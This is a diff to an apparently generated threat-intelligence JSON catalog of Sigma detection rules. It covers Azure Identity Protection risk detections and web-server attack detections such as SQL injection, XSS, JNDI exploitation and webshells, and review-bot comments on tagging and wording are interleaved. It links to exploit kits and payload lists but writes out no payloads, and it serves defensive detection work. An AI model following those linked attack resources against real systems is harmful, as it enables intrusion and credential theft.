+ "https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml"
+ ],
+ "tags": [
+ "attack.t1528",
+ "attack.credential_access"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a",
+
"tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "53acd925-2003-440d-a1f3-71a5253fe237",
+ "value": "Anonymous IP Address"
+ },
+ {
+ "description": "Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/03",
+ "falsepositive": [
+ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user."
+ ],
+ "filename": "azure_identity_protection_new_coutry_region.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#new-country",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.initial_access"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "adf9f4d2-559e-4f5c-95be-c28dff0b1476",
+ "value": "New Country"
+ },
+ {
+ "description": "Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/03",
+ "falsepositive": [
+ "A legitmate forwarding rule."
+ ],
+ "filename": "azure_identity_protection_inbox_forwarding_rule.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml"
+ ],
+ "tags": [
+ "attack.t1140",
+ "attack.defense_evasion"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "27e4f1d6-ae72-4ea0-8a67-77a73a289c3d",
+ "value": "Suspicious Inbox Forwarding Identity Protection"
+ },
+ {
+ "description": "Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/03",
+ "falsepositive": [
+ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user."
+ ],
+ "filename": "azure_identity_protection_atypical_travel.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.initial_access"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "1a41023f-1e70-4026-921a-4d9341a9038e",
+ "value": "Atypical Travel"
+ },
+ {
+ "description": "Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/07",
+ "falsepositive": [
+ "This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated."
+ ],
+ "filename": "azure_identity_protection_prt_access.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml"
+ ],
+ "tags": [
+ "attack.t1528",
+ "attack.credential_access"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a84fc3b1-c9ce-4125-8e74-bdcdb24021f1",
+ "value": "Primary Refresh Token Access Attempt"
+ },
+ {
+ "description": "Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/03",
+ "falsepositive": [
+ "Using an IP address that is shared by many users"
+ ],
+ "filename": "azure_identity_protection_malware_linked_ip.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml"
+ ],
+ "tags": [
+ "attack.t1090",
+ "attack.command_and_control"
+ ]
+ },
+ "related": [
+ {
+
"dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "821b4dc3-1295-41e7-b157-39ab212dd6bd", + "value": "Sign-In From Malware Infected IP" + }, + { + "description": "Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_malicious_ip_address_suspicious.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" + ], + "tags": [ + "attack.t1090", + "attack.command_and_control" + ] + }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "36440e1c-5c22-467a-889b-593e66498472", + "value": "Malicious IP Address Sign-In Suspicious" + }, + { + "description": "Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "User changing to a new device, location, browser, etc." 
+ ], + "filename": "azure_identity_protection_unfamilar_sign_in.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "128faeef-79dd-44ca-b43c-a9e236a60f49", + "value": "Unfamiliar Sign-In Properties" + }, + { + "description": "Indicates sign-in from a malicious IP address based on high failure rates.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
+ ], + "filename": "azure_identity_protection_malicious_ip_address.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml" + ], + "tags": [ + "attack.t1090", + "attack.command_and_control" + ] + }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd", + "value": "Malicious IP Address Sign-In Failure Rate" + }, + { + "description": "Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
+ ], + "filename": "azure_identity_protection_token_issuer_anomaly.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#token-issuer-anomaly", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml" + ], + "tags": [ + "attack.t1606", + "attack.credential_access" + ] + }, + "related": [ + { + "dest-uuid": "94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e3393cba-31f0-4207-831e-aef90ab17a8c", + "value": "SAML Token Issuer Anomaly" + }, + { + "description": "Indicates that the user's valid credentials have been leaked.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "A rare hash collision." 
+ ], + "filename": "azure_identity_protection_leaked_credentials.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml" + ], + "tags": [ + "attack.t1589", + "attack.reconnaissance" + ] + }, + "related": [ + { + "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "19128e5e-4743-48dc-bd97-52e5775af817", + "value": "Azure AD Account Credential Leaked" + }, { "description": "Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.", "meta": { 
@@ -85617,14 +87902,14 @@ "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], - "filename": "azure_identity_protectection_anomalous_token.yml", + "filename": "azure_identity_protection_anomalous_token.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protectection_anomalous_token.yml" + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml" ], "tags": [ "attack.t1528", 
@@ -85643,6 +87928,189 @@ "uuid": "6555754e-5e7f-4a67-ad1c-4041c413a007", "value": "Anomalous Token" }, + { + "description": "Indicates user activity that is unusual for the user or consistent with known attack patterns.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/07", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_threat_intel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", + "value": "Azure AD Threat Intelligence" + }, + { + "description": "Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this 
detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_anonymous_ip_activity.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "be4d9c86-d702-4030-b52e-c7859110e5e8", + "value": "Activity From Anonymous IP Address" + }, + { + "description": "Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "Conneting to a VPN, performing activity and then dropping and performing addtional activity." 
+ ], + "filename": "azure_identity_protection_impossible_travel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b2572bf9-e20a-4594-b528-40bde666525a", + "value": "Impossible Travel" + }, + { + "description": "Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
+ ], + "filename": "azure_identity_protection_suspicious_browser.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "944f6adb-7a99-4c69-80c1-b712579e93e6", + "value": "Suspicious Browser Activity" + }, + { + "description": "Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." 
+ ], + "filename": "azure_identity_protection_anomalous_user.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "258b6593-215d-4a26-a141-c8e31c1299a6", + "value": "Anomalous User Activity" + }, { "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", "meta": { @@ -85693,8 +88161,29 @@ "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_threading_error.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.lateral_movement", + "attack.t1190", + "attack.t1210" + ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "value": "Apache Threading Error" }, 
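Review bot: Several of the new Identity Protection entries in this hunk put an investigation recommendation into `falsepositive` rather than a false-positive condition (Azure AD Threat Intelligence, Suspicious Browser Activity, Anomalous User Activity all carry "We recommend investigating the sessions flagged by this detection…"), and the Impossible Travel entry's only false positive reads `"Conneting to a VPN, performing activity and then dropping and performing addtional activity."` with two typos. For an analyst consuming the galaxy, `falsepositive` is where they look for benign explanations to rule out, so the VPN/split-tunnel case is the useful content and the boilerplate sentence adds nothing. This file appears to be generated from the SigmaHQ rule files each entry links to, so the wording fix belongs in the upstream rule (`Connecting to a VPN, performing activity, then disconnecting and performing additional activity.`) followed by a regeneration rather than a hand edit here. Note also that every `related` link is emitted with `estimative-language:likelihood-probability="almost-certain"`, which looks like a generator default rather than a per-rule judgement.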
@@ -85767,7 +88256,7 @@ "value": "Windows Webshell Strings" }, { - "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "description": "Detects exploitation attempt using the JNDI-Exploit-Kit", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021/12/12", @@ -85779,19 +88268,31 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/pimps/JNDI-Exploit-Kit", "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/pimps/JNDI-Exploit-Kit", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1190" + ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", "value": "JNDIExploit Pattern" }, { - "description": "Detects SQL Injection attempts via GET requests in access logs", + "description": "Detects potential SQL injection attempts via GET requests in access logs.", "meta": { - "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems)", + "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)", "creation_date": "2020/02/22", "falsepositive": [ "Java scripts and CSS Files", 
@@ -85803,16 +88304,29 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://github.com/payloadbox/sql-injection-payload-list", "https://brightsec.com/blog/sql-injection-payloads/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1190" + ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", - "value": "SQL Injection Strings" + "value": "SQL Injection Strings In URI" }, { "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", 
@@ -85861,18 +88375,29 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035", - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml" ], "tags": [ "cve.2022.26134", - "cve.2021.26084" + "cve.2021.26084", + "attack.initial_access", + "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "value": "Java Payload Strings" }, 
@@ -85891,22 +88416,34 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_xss_in_access_logs.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1189" + ] }, + "related": [ + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", "value": "Cross Site Scripting Strings" }, { "description": "Detects path traversal exploitation attempts", "meta": { - "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "author": "Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021/09/25", "falsepositive": [ - "Happens all the time on systems exposed to the Internet", + "Expected to be continuously seen on systems exposed to the Internet", "Internal vulnerability scanners" ], "filename": "web_path_traversal_exploitation_attempt.yml", @@ -85914,6 +88451,7 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://book.hacktricks.xyz/pentesting-web/file-inclusion", "https://github.com/projectdiscovery/nuclei-templates", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" ], 
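Review bot: The XSS rule's new tags `attack.initial_access` / `attack.t1189` (Drive-by Compromise, dest-uuid `d742a578-d70e-4d0e-96a6-02a9c30204e6`) are inconsistent with the sibling web-server rules in this same patch: the SQLi, Java payload and JNDI entries map the same class of request-string detection to `attack.t1190` (Exploit Public-Facing Application, `3f886f2a-874f-4333-b794-aa6075009b1c`). T1189 describes a victim being compromised by visiting an attacker-controlled page, whereas an XSS payload in the server's own access log is an attempt against that server, so T1190 fits the log source better; a stored-XSS-then-drive-by reading is arguable but is not what the rule observes. Since this file appears to be generated from the SigmaHQ rule files, the correction belongs in the upstream rule's tags (`attack.initial_access`, `attack.t1190`), after which the `related` dest-uuid would regenerate to match the siblings.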
@@ -85947,8 +88485,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml" ], @@ -85982,8 +88520,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/sensepost/reGeorg", "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml" ], "tags": [ @@ -86017,8 +88555,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", - "https://www.exploit-db.com/exploits/19525", "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://www.exploit-db.com/exploits/19525", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" ], "tags": [ 
